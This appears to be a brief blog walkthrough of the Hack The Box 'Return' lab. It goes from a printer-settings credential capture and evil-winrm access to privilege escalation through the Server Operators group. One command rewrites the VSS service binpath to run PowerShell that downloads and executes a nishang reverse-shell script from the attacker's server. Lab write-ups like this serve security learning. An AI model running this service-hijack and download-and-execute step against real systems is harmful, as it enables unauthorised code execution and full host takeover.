HTB Return

Run a Nmap scan to find for open ports.

Head to the web browser.

We can change the settings and start a nc listener.
Printer password is gained.

Use the evil-winrm tool to gain acess.

Found the user flag.

Using the net user command , we are able to use Server Operators

Let’s use a powershell script from nishang :

Change the IP address to your attacking machine.

Start a python server with the same location of the powershell script

Start a nc listener on port 4444.

Use the following commands to start the server to download the script and execute it.

sc.exe config VSS binpath=”C:\Windows\System32\cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring(‘’)”

sc.exe stop VSS

sc.exe start VSS

The script has been downloaded.

Access gained.

Head to the Administrator desktop to get the root flag.

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s